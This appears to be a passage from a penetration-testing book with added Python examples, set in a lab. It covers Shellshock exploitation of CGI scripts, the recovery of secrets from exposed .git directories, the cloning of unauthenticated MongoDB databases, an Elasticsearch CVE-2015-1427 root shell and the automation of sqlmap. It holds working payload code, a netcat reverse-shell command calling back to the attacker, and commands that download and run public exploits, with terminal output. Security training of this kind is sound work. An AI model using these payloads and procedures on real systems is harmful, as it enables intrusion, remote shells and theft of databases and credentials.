This script will brute-force through many different common cgi paths and filenames. If it successfully 
identifies a file, it injects the Shellshock payload into the request headers to force the system to ping 
back to our attacking host. A ping arriving at our listener shows that the victim is not only vulnerable, 
but that we also have command execution. 


This is why we set tcpdump to listen for ICMP echo requests. In the example below, the icmpshock.py 
script is going through its list of cgi locations/files and when it hits cgi-bin/test.cgi, it causes the victim 
host to ping our attacker box. 

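The check that icmpshock.py automates, reduced to its three pieces, as an added example that is not the book's tool and not code from its repository: the header set (every header a Bash-backed CGI handler exports into the environment carries the same payload), a single probe request, and a parser for the tcpdump line that turns the ICMP callback into proof of execution. It uses only the Python standard library; the target URL and listener IP are placeholders and the sample tcpdump line is constructed to match the format shown in the screenshot below. 

```python
import re
import urllib.request
from typing import Dict, Optional
from urllib.error import URLError

# Constructed sample of the line tcpdump -nn -e prints when the callback arrives.
SAMPLE_TCPDUMP_LINE = (
    "01:08:40.354113 00:0c:29:72:0c:8c > 00:0c:29:e3:f6:49, ethertype IPv4 (0x0800), "
    "length 98: 192.168.222.130 > 192.168.222.129: ICMP echo request, id 5743, seq 1, length 64"
)

# Headers the web server exports into the CGI environment as HTTP_USER_AGENT,
# HTTP_COOKIE, HTTP_HOST and HTTP_REFERER; each one is an injection point.
INJECTABLE_HEADERS = ("User-Agent", "Cookie", "Host", "Referer")

PING_BACK = "/bin/ping -c1 {listener}"


def shellshock_headers(command: str) -> Dict[str, str]:
    """Put the same payload in every header Bash will import as a variable.

    "() { :; }" is a syntactically valid no-op function; a vulnerable Bash keeps
    parsing past the closing "};" and runs `command` as the CGI script starts.
    """
    return {name: "() { :; }; " + command for name in INJECTABLE_HEADERS}


def probe(url: str, listener_ip: str, timeout: float = 5.0) -> Optional[int]:
    """Fire one ping-back request at a CGI URL and return the HTTP status.

    The status only shows the script was reached (a 500 is common, because the
    injected command runs before the script prints its own headers). The proof
    of execution is the ICMP echo request on the listener; see callback_source.
    """
    headers = shellshock_headers(PING_BACK.format(listener=listener_ip))
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except URLError as exc:
        # HTTPError carries the status code; a refused/timed-out connection does not.
        return getattr(exc, "code", None)


_ECHO_REQ = re.compile(
    r"(?P<src>(?:\d{1,3}\.){3}\d{1,3}) > (?P<dst>(?:\d{1,3}\.){3}\d{1,3}): ICMP echo request"
)


def callback_source(tcpdump_line: str, listener_ip: str) -> Optional[str]:
    """Return the IP that pinged listener_ip, or None if the line is not an echo request to us."""
    m = _ECHO_REQ.search(tcpdump_line)
    return m.group("src") if m and m.group("dst") == listener_ip else None


if __name__ == "__main__":
    import sys
    # python shellshock_probe.py http://TARGET/cgi-bin/test.cgi LISTENER_IP
    print("HTTP status:", probe(sys.argv[1], sys.argv[2]))
```

Run it with the tcpdump listener from the previous step already capturing; the status code printed is informational, and only a line matching callback_source on the listener counts as a confirmed vulnerable host. 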


[Screenshot, attacking host. First terminal: tcpdump -nni eth0 -e 'icmp[icmptype] == 8' shows 
192.168.222.130 > 192.168.222.129: ICMP echo request, id 5743, seq 1, length 64. Second terminal: 
python icmpshock.py 192.168.222.129 target_list.txt reports Listening Address 192.168.222.129, 
Thread Count 100, target 192.168.222.130, then HTTP CODE 200 > http://192.168.222.130/cgi-bin/test.cgi 
and HTTP CODE 200 > http://192.168.222.130/.] 


ICMP Shock Exploit 

We now know we have command execution and can go back to our script to change the “Command” 
variable to run whatever shell command we want: 

• gedit icmpshock.py 


We won’t get into post exploitation in this section, but the easiest thing to do is to make the victim 
spawn a reverse shell back to a netcat listener. Let’s uncomment the line with the /bin/nc command and 
comment out the original ping command. 


[Screenshot, icmpshock.py open in gedit. The relevant lines read:] 

# If we see ICMP packets coming to our machine from the target, we will 
# know that the target is vulnerable. 
# The first system argument is our own machine; this should be the 
# address used to locally run tcpdump. 
# The following variables are defined as headers for our POST request. 

#Command = "/bin/ping -c1 " + LISTENER 
Command = "/bin/nc " + LISTENER + " 4444 -e /bin/bash" 

USER_AGENT = "() { :; }; " + Command 
Cookie = "() { :; }; " + Command 
Host = "() { :; }; " + Command 


ICMP Shock - Enabling a Netcat Listener 


After making modifications to the code, we need to open a new terminal window and set up a netcat 
listener (instead of the ICMP tcpdump listener configured in the prior example) on the attacking host: 

• nc -l -p 4444 


Run the icmpshock.py tool again and you should get a connection back. To test, we can run a quick 
“list directory contents” command (ls) and we should see the files in that directory. Note that the 
-e option only exists in netcat builds that were compiled with it; if the target's nc lacks it, the 
Command variable has to use a different reverse shell (for example Bash's /dev/tcp). 











[Screenshot: on the attacking host, nc -l -p 4444 receives the connection; typing ls lists test.cgi and 
whoami returns www-data. The icmpshock.py run in the second terminal again reports HTTP CODE 200 
for http://192.168.222.130/.] 


ICMP Shock - Exploit 


We have a full shell on all the vulnerable shellshock systems. We aren’t limited to only web-based 
shellshock exploits either, as you can see below: 

• SSH: 

o http://resources.infosecinstitute.com/practical-shellshock-exploitation-part-2/ 

• DHCP: 

o https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/dhcp/bash_environment 

• OSX/VMware: 

o https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/vmware_bash_func 

• OpenVPN: 

o http://www.darknet.org.uk/2014/10/openvpn-vulnerable-to-shellshock-exploit/ 


Dumping Git Repositories (Kali Linux) 


It is becoming a very common practice for web developers to use revision control systems for their 
code base. Different examples of these tools are Git, Bazaar, Mercurial and Subversion, but they all 
work relatively the same. A common mistake seen throughout many development environments is that 
developers deploy the working copy with its repository metadata, leaving the repository (repo) publicly 
accessible on the web server. {9} {10} 


As a penetration tester, once a repository is identified via a web scanner, the common technique is to 
clone the repository, look for sensitive information in different commits, and restore older versions of 
the application. As seen in our next example, Git repositories are usually found in a .git directory 
(example: 10.10.10.10/.git/). 


[Screenshot, browser at http://10.10.10.10/.git/ showing a directory index:] 

Index of /.git 

• Parent Directory 
• FETCH_HEAD 
• HEAD 
• ORIG_HEAD 
• branches/ 
• config 
• description 
• hooks/ 
• index 
• info/ 
• logs/ 
• objects/ 
• packed-refs 
• refs/ 

Vulnerable Git Repository 


We can copy the whole remote Git repository onto our Kali Linux host by running a recursive wget 
command against the .git root (we will assume 10.10.10.10 is the vulnerable server): 

• cd ~ 

• wget -r http://10.10.10.10/.git/ 

• cd 10.10.10.10 

The recursive fetch relies on directory indexing being enabled, as in the listing above. If the server 
returns 403 for /.git/ but still serves the files inside it, request the known paths individually (HEAD, 
config, index, refs/heads/*, and the objects they reference) instead of relying on wget -r. 


We now have the Git repository cloned onto our local computer and we can run a couple of Git 
commands to pilfer data. The first command to run is a status command, which shows the state of the 
files in the index versus the working directory. Because we only fetched the .git directory and not the 
deployed files themselves, every tracked file shows up as deleted, which is exactly what we want: the 
list is an inventory of every file in the last commit. Run it with: 

• git status 


# deleted: images/deselect-arrow.png 
# deleted: images/disclaimer-dot.png 
# deleted: images/headerBg.png 
# deleted: js/libs/respond.min.js 
# deleted: secret.php 
no changes added to commit (use "git add" and/or "git commit -a") 
root@kali:~/10.10.10.10# git status 


Git - Deleted Files 


In the status output, we see that secret.php is tracked in the repository but missing from our copy. To 
see what it contained, we can run a git diff command, which generates patch-style output of the 
differences between the index and the working directory (or between any two commits or files in the 
repository). To view the exact changes, run the git diff command {11}: 

• git diff 



diff --git a/secret.php b/secret.php 
deleted file mode 100644 
index 77eaa2f..0000000 
--- a/secret.php 
+++ /dev/null 
@@ -1,162 +0,0 @@ 
-<!DOCTYPE html> 
-<!--[if IE 7]> <html class="no-js ie7 oldie" lang=... 
-<!--[if IE 8]> <html class="no-js ie8 oldie" lang=... 
-<!--[if IE 9]> <html class="no-js ie9 oldie" lang=... 
-<!--[if gt IE 9]><!--> <html class="no-js" l<br>ang="en"> 
-<head> 
- <meta charset="utf-8"> 
- <meta name="viewport" content="width=device-width"> 
- #Super secret password = "thekeystothekingdom" 


Git - Recovering Passwords 


After running the diff command, we see the contents of secret.php as stored in the last commit, 
including the “Super secret password”. We can also recover the whole file (and every other tracked 
file) by resetting the working directory to the last commit: 

• git reset --hard 

To look further back than the last commit, git log -p walks every commit together with its full diff, 
which is where passwords that were “removed” in a later commit turn up. 


These same types of techniques can be used to recover data from different types of repositories, but I 
wanted to point out the wealth of data that can be obtained from bad practices and misconfiguration. 

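What git is doing for us in the steps above, as an added example that is not the book's code and not part of any git tool: a reader for loose objects in .git/objects (zlib-inflated "<kind> <size>\0<data>", SHA-1 of that whole buffer as the id), parsers for commit and tree objects, and a history walk that reports every file version containing a given byte string, deleted files included. It only handles loose objects; a repository whose history was packed (objects/pack/) also needs the pack index parsed, or simply the git client once the files are downloaded. The demo repository is constructed in a temp directory (its only file names and the password value echo the listing above); nothing is fetched from a server. 

```python
import hashlib
import os
import tempfile
import zlib
from typing import Dict, List, Tuple


def hash_object(kind: str, data: bytes) -> Tuple[str, bytes]:
    """Git's object id is SHA-1 over "<kind> <size>\\0<data>"; returns (id, buffer)."""
    raw = f"{kind} {len(data)}\0".encode() + data
    return hashlib.sha1(raw).hexdigest(), raw


def read_loose(gitdir: str, sha: str) -> Tuple[str, bytes]:
    """Inflate .git/objects/xx/yyyy..., split off the header and check the size."""
    with open(os.path.join(gitdir, "objects", sha[:2], sha[2:]), "rb") as f:
        raw = zlib.decompress(f.read())
    header, _, body = raw.partition(b"\0")
    kind, size = header.decode().split()
    if int(size) != len(body):
        raise ValueError(f"corrupt object {sha}")
    return kind, body


def parse_commit(body: bytes) -> dict:
    """Header lines (tree, parent*, author, committer), blank line, message."""
    headers, _, message = body.partition(b"\n\n")
    info: dict = {"parents": [], "message": message.decode(errors="replace")}
    for line in headers.decode().splitlines():
        key, _, value = line.partition(" ")
        if key == "parent":
            info["parents"].append(value)
        else:
            info[key] = value
    return info


def parse_tree(body: bytes) -> List[Tuple[str, str, str]]:
    """Entries are "<mode> <name>\\0" followed by the 20 raw bytes of the object id."""
    entries, i = [], 0
    while i < len(body):
        nul = body.index(b"\0", i)
        mode, name = body[i:nul].decode().split(" ", 1)
        entries.append((mode, name, body[nul + 1:nul + 21].hex()))
        i = nul + 21
    return entries


def files_at(gitdir: str, commit_sha: str) -> Dict[str, bytes]:
    """Flatten one commit's tree into {path: blob contents}, recursing into subdirectories."""
    out: Dict[str, bytes] = {}

    def walk(tree_sha: str, prefix: str) -> None:
        for mode, name, sha in parse_tree(read_loose(gitdir, tree_sha)[1]):
            if mode == "40000":
                walk(sha, prefix + name + "/")
            else:
                out[prefix + name] = read_loose(gitdir, sha)[1]

    walk(parse_commit(read_loose(gitdir, commit_sha)[1])["tree"], "")
    return out


def grep_history(gitdir: str, head_sha: str, needle: bytes) -> List[Tuple[str, str]]:
    """Walk first-parent history from head_sha (the id in HEAD or refs/heads/<branch>)
    and return (commit, path) for every file version containing needle."""
    hits, sha = [], head_sha
    while sha:
        hits += [(sha, p) for p, blob in files_at(gitdir, sha).items() if needle in blob]
        parents = parse_commit(read_loose(gitdir, sha)[1])["parents"]
        sha = parents[0] if parents else ""
    return hits


# Everything below only builds the constructed sample repository for the demo.
def _put(gitdir: str, kind: str, data: bytes) -> str:
    sha, raw = hash_object(kind, data)
    path = os.path.join(gitdir, "objects", sha[:2], sha[2:])
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(zlib.compress(raw))
    return sha


def _tree(entries: List[Tuple[str, str, str]]) -> bytes:
    return b"".join(f"{m} {n}\0".encode() + bytes.fromhex(s)
                    for m, n, s in sorted(entries, key=lambda e: e[1]))


def _commit(tree: str, parents: List[str], msg: str) -> bytes:
    who = "dev <dev@example.test> 1425927675 +0000"
    head = [f"tree {tree}"] + [f"parent {p}" for p in parents]
    return "\n".join(head + [f"author {who}", f"committer {who}", "", msg]).encode()


def build_demo_repo() -> Tuple[str, str]:
    """Commit 1 adds secret.php holding a password; commit 2 (HEAD) deletes it. Returns (gitdir, head)."""
    gitdir = os.path.join(tempfile.mkdtemp(), ".git")
    page = _put(gitdir, "blob", b"<html>public page</html>\n")
    secret = _put(gitdir, "blob", b'<?php $db_pass = "thekeystothekingdom"; ?>\n')
    t1 = _put(gitdir, "tree", _tree([("100644", "index.html", page), ("100644", "secret.php", secret)]))
    t2 = _put(gitdir, "tree", _tree([("100644", "index.html", page)]))
    c1 = _put(gitdir, "commit", _commit(t1, [], "initial site"))
    c2 = _put(gitdir, "commit", _commit(t2, [c1], "remove secret.php"))
    return gitdir, c2
```

Against a downloaded repository, read the 40-character id out of HEAD (or the file HEAD points to under refs/heads/) and pass it to grep_history together with the string you are hunting for; the ids it reports are the commits to inspect with git show. 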

NoSQLmap 

(www.nosqlmap.net/) (Kali Linux) 


I will discuss NoSQL further below in the web exploitation section, but with the increasing growth of 
NoSQL databases it is important to know how to interact with them. On numerous tests, scanners will 
find open Mongo/Couch databases with no passwords. I might not have time during the test to go 
through all the data in those databases, so this is where tools provide great value. If you want to 
replicate this specific attack, go into the NoSQL Database Injections section and set up the vulnerable 
Mongo database and associated web application. 


Starting NoSQLmap: 


• cd /opt/NoSQLMap 

• python nosqlmap.py 

• 1 - Set Options 

o Set options for target host IP (your Mongo IP) 
o Set local MongoDB/Shell IP (your IP) 
o b - Save option file 
o x - to Exit 

• 2 - NoSQL DB Access Attacks 

Once the attack starts, you should see the following: 

DB Access attacks (MongoDB) 
================= 
Checking to see if credentials are needed... 
Successful access with no credentials! 
MongoDB web management open at http://192.168.199.128:28017. No authentication required! 
Start tests for REST Interface (y/n)? y 
REST interface not enabled. 
1-Get Server Version and Platform 
2-Enumerate Databases/Collections/Users 
3-Check for GridFS 
4-Clone a Database 
5-Launch Metasploit Exploit for Mongo <2.2.4 
6-Return to Main Menu 
Select an attack: 1 
Server Info: 
MongoDB Version: 2.0.6 
Debugs enabled : False 
Platform: 32 bit 
Select an attack: 2 
List of databases: 
local 
admin 
users 
appUserData 
Select an attack: 4 
Select a database to steal: 5 
Does this database require credentials (y/n)? n 
Database cloned. Copy another (y/n)? n 

So, what we effectively did was copy the victim’s Mongo database to our local Mongo instance. We 
can now copy all the databases we have access to and look at them at a later time for sensitive 
information. How do we look at this data? In our example, we stole the database appUserData and 
cloned it. In our local copy of Mongo, we will see a new database populated called 
appUserData_stolen (the screenshot below was taken against a copy named appUserData). To view it: 

• mongo 

• show dbs 

• use appUserData 

• show collections 

• db.users.find() 


> use appUserData 
switched to db appUserData 
> show collections 
system.indexes 
users 
> db.users.find() 
{ "_id" : ObjectId("54f4a7e4fc5c9a60dd70fd11"), "name" : "James", "username" : "james@suck.testlab" } 
{ "_id" : ObjectId("54f4a80..."), "name" : "frank", "username" : "frank@suck.testlab" } 
{ "_id" : ObjectId("54f4a81a..."), "name" : "paul", "username" : "paul@suck.testlab" } 


NoSQLMap - Cloning 



If you spend some time looking at the power of NoSQLMap, you will also see that there are some 
modules for exploitation. The tool also integrates a Metasploit exploit module for Mongo systems 
below version 2.2.4. 


Elastic Search (Kali Linux) 


I will say this throughout the book: One of the most important things in becoming a penetration tester 
is understanding a wide breadth of different technologies. Building a lab in your own environment 
with all the different types of servers will help identify what you might run into in the real world. I 
was on an engagement where the vulnerability scanners didn’t find any vulnerabilities for an Elastic 
Search (ES) database. By default, ES exposes its HTTP REST API (search and administration) on 
port 9200 with no authentication at all. It might have looked something like this: 


[Screenshot, Iceweasel at http://elastic.hacker.testlab:9200/_search?q=*&pretty:] 

{ 
  "took" : 83, 
  "timed_out" : false, 
  "_shards" : { 
    "total" : 1, 
    "successful" : 1, 
    "failed" : 0 
  }, 
  "hits" : { 
    "total" : 4936, 
    "max_score" : 1.0, 
    "hits" : [ { 
      "_index" : ".marvel-2015.03.09", 
      "_type" : "node_stats", 
      "_id" : "AUv_6aOJAJxlgIsvbP9A", 
      "_score" : 1.0, 
      "_source" : { 
        "@timestamp" : "2015-03-09T19:01:15.975Z", 
        "cluster_name" : "elasticsearch", 
        ... 

Elastic Search - Vulnerable search service 


After finding something like this, I instantly knew that 9200 was the default Elastic Search port, and 
because I monitor security RSS feeds, I remembered that there was a recent vulnerability for it 
(https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/). 

Searching through exploit code, I was able to find one on Xiphos Research 
(https://github.com/XiphosResearch/exploits/tree/master/ElasticSearch). I ran a quick wget on my 
Kali host, connected via the exploit and had a root shell. The shell runs as whatever user the ES 
process runs as; on this host that was root, on a properly deployed node it would be the elasticsearch 
service account. 









root@kali:/opt# python ./elastic_shell.py elastic.hacker.testlab 

Exploit for ElasticSearch, CVE-2015-1427 Version: 20150309.1 
{*} Spawning Shell on target... Do note, its only semi-interactive... 
~$ id 
uid=0(root) gid=0(root) groups=0(root) 
~$ cat /etc/passwd 
root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
bin:x:2:2:bin:/bin:/bin/sh 
sys:x:3:3:sys:/dev:/bin/sh 
sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/bin/sh 
man:x:6:12:man:/var/cache/man:/bin/sh 
lp:x:7:7:lp:/var/spool/lpd:/bin/sh 
mail:x:8:8:mail:/var/mail:/bin/sh 
news:x:9:9:news:/var/spool/news:/bin/sh 
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh 
proxy:x:13:13:proxy:/bin:/bin/sh 
www-data:x:33:33:www-data:/var/www:/bin/sh 


Elastic Search - Exploit 

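The recognition step described above, written out as an added example that is neither the book's code nor the Xiphos Research exploit: pull the node banner from port 9200, decide from the version number whether the default scripting engine is one of the two publicly known remote code execution bugs (CVE-2014-3120 for releases before 1.2, CVE-2015-1427 for 1.3.0 to 1.3.7 and 1.4.0 to 1.4.2), and count the hits that an unauthenticated _search?q=* returns per index so you know what is worth dumping. The two JSON samples are constructed (the version string is the one the lab below installs; the hostname, ids and the "customers" index are made up) so the checks run offline. 

```python
import json
import urllib.request
from typing import Dict, List, Tuple

# Constructed sample of GET http://host:9200/ from a 1.x node.
SAMPLE_BANNER = b"""{
  "status" : 200,
  "name" : "lab-node",
  "cluster_name" : "elasticsearch",
  "version" : { "number" : "1.4.1", "build_snapshot" : false, "lucene_version" : "4.10.2" },
  "tagline" : "You Know, for Search"
}"""

# Constructed sample of GET /_search?q=*&pretty, trimmed to the fields read below.
SAMPLE_SEARCH = b"""{
  "took" : 83, "timed_out" : false,
  "hits" : { "total" : 4936, "max_score" : 1.0, "hits" : [
    { "_index" : ".marvel-2015.03.09", "_type" : "node_stats", "_id" : "a1", "_score" : 1.0,
      "_source" : { "cluster_name" : "elasticsearch" } },
    { "_index" : "customers", "_type" : "user", "_id" : "b2", "_score" : 1.0,
      "_source" : { "email" : "james@suck.testlab", "password_hash" : "constructed" } }
  ] }
}"""

# First release on each branch that contains the fix for the Groovy sandbox bypass.
CVE_2015_1427_FIXED = {(1, 3): (1, 3, 8), (1, 4): (1, 4, 3)}


def version_tuple(number: str) -> Tuple[int, ...]:
    return tuple(int(p) for p in number.split(".")[:3])


def parse_banner(body: bytes) -> Dict[str, str]:
    doc = json.loads(body)
    return {"cluster": doc.get("cluster_name", ""), "node": doc.get("name", ""),
            "version": doc["version"]["number"]}


def script_rces(number: str) -> List[str]:
    """Known RCEs in the default scripting engine for this version (both run as the ES user)."""
    v = version_tuple(number)
    found = []
    if v < (1, 2, 0):
        found.append("CVE-2014-3120")   # MVEL dynamic scripting enabled by default
    fixed = CVE_2015_1427_FIXED.get(v[:2])
    if fixed and v < fixed:
        found.append("CVE-2015-1427")   # Groovy sandbox escape, 1.3.0-1.3.7 and 1.4.0-1.4.2
    return found


def index_summary(body: bytes) -> Dict[str, int]:
    """Count returned hits per index; shows which indices hold application data vs. monitoring noise."""
    counts: Dict[str, int] = {}
    for hit in json.loads(body)["hits"]["hits"]:
        counts[hit["_index"]] = counts.get(hit["_index"], 0) + 1
    return counts


def fingerprint(host: str, port: int = 9200, timeout: float = 5.0) -> dict:
    """Live version of the checks above against a reachable node (1.x needs no credentials)."""
    with urllib.request.urlopen(f"http://{host}:{port}/", timeout=timeout) as r:
        info: dict = parse_banner(r.read())
    info["script_rces"] = script_rces(info["version"])
    with urllib.request.urlopen(f"http://{host}:{port}/_search?q=*&size=50", timeout=timeout) as r:
        info["indices_seen"] = index_summary(r.read())
    return info
```

fingerprint("elastic.hacker.testlab") is the call that reproduces the engagement above; a non-empty script_rces list is the cue to reach for the public exploit, and indices_seen tells you whether the data behind it is only Marvel monitoring or something more interesting. 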

Elastic Search Lab: 


If you want to build and test your own vulnerable Elastic Search service, you can install it with the 
following (1.4.1 predates the fix, which shipped in 1.4.3): 

• update-java-alternatives --jre -s java-1.7.0-openjdk-i386 

• wget https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-1.4.1.zip 

• unzip elasticsearch-1.4.1.zip 

• cd elasticsearch-1.4.1/bin/ 

• ./plugin -i elasticsearch/marvel/latest 

• ./elasticsearch 


Once elasticsearch is running, you can download and execute your exploit code: 

• wget https://raw.githubusercontent.com/XiphosResearch/exploits/master/ElasticSearch/elastic_shell.py 

• chmod +x ./elastic_shell.py 

• python ./elastic_shell.py localhost 


And with that, you have compromised another database and obtained access onto a ton of different 
hosts. 


Summary 


This is a baseline overview on taking the findings from the scanner results and putting them into 
action. These examples will help lead into how to exploit systems in the upcoming chapters. Attacks 
and exploits might not always work, which is why I stress that my readers avoid being tool- 
dependent. It is more important to understand why an attack works and what the underlying issue is, 
so that if a tool fails, you have the ability to modify and fix that exploit. 


What helped me learn how to exploit computers was to take exploits from sites like 
http://www.exploit-db.com/remote/ and recreate them in another high-level scripting language of my 
choice. Developing these types of scripts and testing them against your own servers will help you 
gain a much stronger background in coding and a better understanding of why vulnerabilities work. If 
you are looking to dive deeper into exploit development, I recommend reading The Shellcoder's 
Handbook: http://amzn.to/1QZlgfT. 



The Throw - Manual Web Application Findings 


At this point, you have assessed SUCK’s network, compromised the network scanner vulnerabilities, 
and now you need to move on to web attacks. As more and more companies start to run vulnerability 
scans of their own, I have slowly (slowly) been seeing a trend of the low-hanging service-based 
vulnerabilities going away (like MS08-067). Application-based vulnerabilities, on the other hand, are 
still an easy target to exploit, since most vulnerability scanners either do not provide web application 
testing or do not enable web application scanning because it may break applications or take way too 
long to scan. 

As this book is geared more toward Red Teaming concepts, this book does not go in depth on all the 
different vulnerabilities and how to manually exploit them. This is because a manual web application 
book needs to be very detailed and discuss all the more obscure attacks like CORS (Cross-Origin 
Resource Sharing), SSRF (Server-Side Request Forgery), the various one-off OAuth issues that come 
with misconfiguration of security controls, and others. If you are looking for more information on 
testing all sorts of web type vulnerabilities, you should heavily use these three resources: 

• OWASP Testing Guide 

o http://bit.ly/19GkG5R 

o https://www.owasp.org/images/1/19/OTGv4.pdf 

• SANS - Securing Web Application Technologies 

o https://www.sans.org/security-resources/posters/securing-web-application-technologies-swat-2014-60/download 

• The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws 

o http://amzn.to/1lxZaCv 


Lastly, if you read about Printer Exploitation in The Drive section, that is a great example of how a 
web configuration vulnerability can get you to DA (or at least a domain account). 


Web Application Penetration Testing 


In the initial prep section, we have set up a couple of vulnerable VMs for testing. Since some of this 
section will be based off the OWASP Broken Web Application VM, I highly recommend you set it up 
prior to reading this chapter. You can download the VM here: 

• http://sourceforge.net/projects/owaspbwa/files/ 

Once you download it, you can unzip it and run it in either VMWare or VM Player. Once loaded, grab 
the IP of the virtual machine and open it up in your local browser. It should look something like the 
following: 
OWASPBWA 


This is one of my favorite web application testing platforms. Definitely spend time learning how to 
break different web applications. 


SQL Injections 


From either the scanning results or from just poking around, you might be able to identify some SQL 
injections (SQLi) vulnerabilities. This is great because SQLi vulnerabilities can lead to a full 
compromise of the database or of the system itself. Two open source tools that I have found to work 
most of the time are SQLmap and Sqlninja. Let's go through the process from identification to 
exploitation. 


SQLMap with Burp 

SQLmap is one of my favorite tools to use for finding SQL injections, manipulating database queries, 
and dumping databases. It also has additional functionality to get an interactive shell through an 
injection and can even spawn Meterpreter or a VNC session back to the attacker. 


Before I show you how to use the command line versions of these tools, we will see how integration 
with Burp Proxy Pro also works extremely well. This has saved me from memorizing all of the 
different commands and allowed me to focus on being more efficient and effective. 


Install: 

• Jython 2.7beta3 

o http://www.jython.org/downloads.html 

o Download Jython 2.7beta3 - Standalone Jar: For embedding Jython in Java applications 

• Start Burp with: java -XX:MaxPermSize=1G -jar burpsuite_pro_v1.6.10.jar 

• Extender -> Options -> Python Environment -> Add the location and file of where you 
downloaded Jython 

• Restart Burp 

• Extender -> BApp Store 

• Select SQLiPy 

• (might as well install HTML5 Auditor, J2EEScan, CO2) 

• Restart Burp 


[Screenshot, Burp Extender -> BApp Store with SQLiPy selected. The detail pane reads: “This extension 
integrates Burp Suite with SQLMap.” Requirements listed: Jython 2.7 beta (due to the use of JSON); 
Java 1.7 or 1.8; a running instance of the SQLMap API server, which you can start manually with 
python sqlmapapi.py -s -H <ip> -p <port> or from the extension’s SQLMap API tab by giving it the 
path to python and sqlmapapi.py. Once the API is running, right-click a request in the Target or Proxy 
tab, choose “SQLiPy Scan”, and the SQLMap Scanner tab is populated; “Start Scan” runs it and any 
injection found is added to the Scanner results. Author: Josh Berry, Code Watch. Version: 0.3.8.] 

Burp - SQLiPy 


To use Burp and SQLMap, you start an SQLMap API on your Kali box; meanwhile, Burp Proxy Pro 
can be running anywhere. When Burp finds an SQL injection, it will connect to SQLMap’s running 
API to automatically attack the vulnerable parameters. Let’s now start the SQLMap API listener. 
Keep in mind that the scan endpoints of this API carry no authentication (only the admin endpoints 
need the admin token), so anyone who can reach the port can queue scans through your box: bind it 
to an address that only your Burp host can reach. 

Start SQLMap API: 

• cd /opt/sqlmap 

• python sqlmapapi.py -s -H [IP] -p [PORT] 



















root@kali:/opt/sqlmap# python sqlmapapi.py -s -H 172.16.151.128 -p 8083 
[01:07:58] [INFO] Running REST-JSON API server at '172.16.151.128:8083' 
[01:07:58] [INFO] Admin ID: 447c0d7228e489f2a350e09434430... 
[01:07:58] [DEBUG] IPC database: /tmp/sqlmapipc-... 
[01:07:58] [DEBUG] REST-JSON API server connected to IPC database 


SQLMap API 

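What SQLiPy does behind the Burp tab, as an added example that is not the extension's code and not part of sqlmap: a small client for the REST-JSON server started above (create a task, start it with sqlmap's own option names, poll until it terminates, fetch the findings, delete the task) plus a summarizer for the data the server returns. The numeric content-type codes are the ones sqlmap's API uses for target, techniques, banner and so on; the sample scan data is constructed to that shape (the technique details are simplified) with the banner string taken from the sqlmap output later in this chapter, so the summarizer can be exercised without a running server. The default base URL is an assumption (sqlmapapi.py listens on port 8775 unless you pass -p). 

```python
import json
import time
import urllib.request
from typing import Any, Dict, List, Optional

# Content-type codes in /scan/<id>/data entries (CONTENT_TYPE in sqlmap's enums);
# only the ones this client reports are listed.
CONTENT_TYPE = {0: "target", 1: "techniques", 2: "dbms_fingerprint", 3: "banner",
                4: "current_user", 5: "current_db", 6: "hostname", 7: "is_dba",
                8: "users", 9: "password_hashes", 12: "dbs"}

# Constructed sample of a finished scan's "data" list (technique details simplified).
SAMPLE_SCAN_DATA = [
    {"status": 1, "type": 0, "value": {"url": "http://192.168.1.124/mutillidae/index.php",
                                       "query": "page=user-info.php&username=asdf&password=sdf",
                                       "data": None}},
    {"status": 1, "type": 1, "value": {"username": {"place": "GET", "dbms": "MySQL",
                                                    "title": "MySQL UNION query (NULL) - 5 columns"}}},
    {"status": 1, "type": 3, "value": "5.1.41-3ubuntu12.6-log"},
    {"status": 1, "type": 4, "value": "root@localhost"},
    {"status": 1, "type": 12, "value": ["information_schema", "owasp10"]},
]


class SqlmapApi:
    """Minimal client for the REST-JSON server started with sqlmapapi.py -s."""

    def __init__(self, base: str = "http://127.0.0.1:8775", timeout: float = 30.0) -> None:
        self.base, self.timeout = base.rstrip("/"), timeout

    def _call(self, path: str, payload: Optional[dict] = None) -> dict:
        data = None if payload is None else json.dumps(payload).encode()
        req = urllib.request.Request(self.base + path, data=data,
                                     headers={"Content-Type": "application/json"})
        with urllib.request.urlopen(req, timeout=self.timeout) as resp:
            return json.loads(resp.read())

    def new_task(self) -> str:
        return self._call("/task/new")["taskid"]

    def start(self, taskid: str, options: Dict[str, Any]) -> None:
        reply = self._call(f"/scan/{taskid}/start", options)
        if not reply.get("success"):
            raise RuntimeError(reply.get("message", "scan did not start"))

    def wait(self, taskid: str, poll_seconds: float = 2.0) -> None:
        while self._call(f"/scan/{taskid}/status")["status"] != "terminated":
            time.sleep(poll_seconds)

    def data(self, taskid: str) -> List[dict]:
        return self._call(f"/scan/{taskid}/data")["data"]

    def delete(self, taskid: str) -> None:
        self._call(f"/task/{taskid}/delete")


def scan_options(url: str, post_data: Optional[str] = None,
                 cookie: Optional[str] = None) -> Dict[str, Any]:
    """Option names are sqlmap's internal ones (what --banner, --current-user, --dbs set)."""
    opts: Dict[str, Any] = {"url": url, "level": 3, "risk": 1,
                            "getBanner": True, "getCurrentUser": True, "getDbs": True}
    if post_data:
        opts["data"] = post_data   # POST body; without it only GET parameters are tested
    if cookie:
        opts["cookie"] = cookie    # required for pages behind a login
    return opts


def summarize(data: List[dict]) -> Dict[str, Any]:
    """Key the raw entry list by content name.

    A "techniques" entry only exists once sqlmap has confirmed an injection, so its
    presence is the same signal that produces the "SQLMap Scan Finding" in Burp.
    """
    out = {CONTENT_TYPE.get(e["type"], f"type_{e['type']}"): e["value"]
           for e in data if e.get("status") == 1}
    out["injectable"] = "techniques" in out
    return out


def run_scan(api: SqlmapApi, url: str, post_data: Optional[str] = None,
             cookie: Optional[str] = None) -> Dict[str, Any]:
    taskid = api.new_task()
    try:
        api.start(taskid, scan_options(url, post_data, cookie))
        api.wait(taskid)
        return summarize(api.data(taskid))
    finally:
        api.delete(taskid)
```

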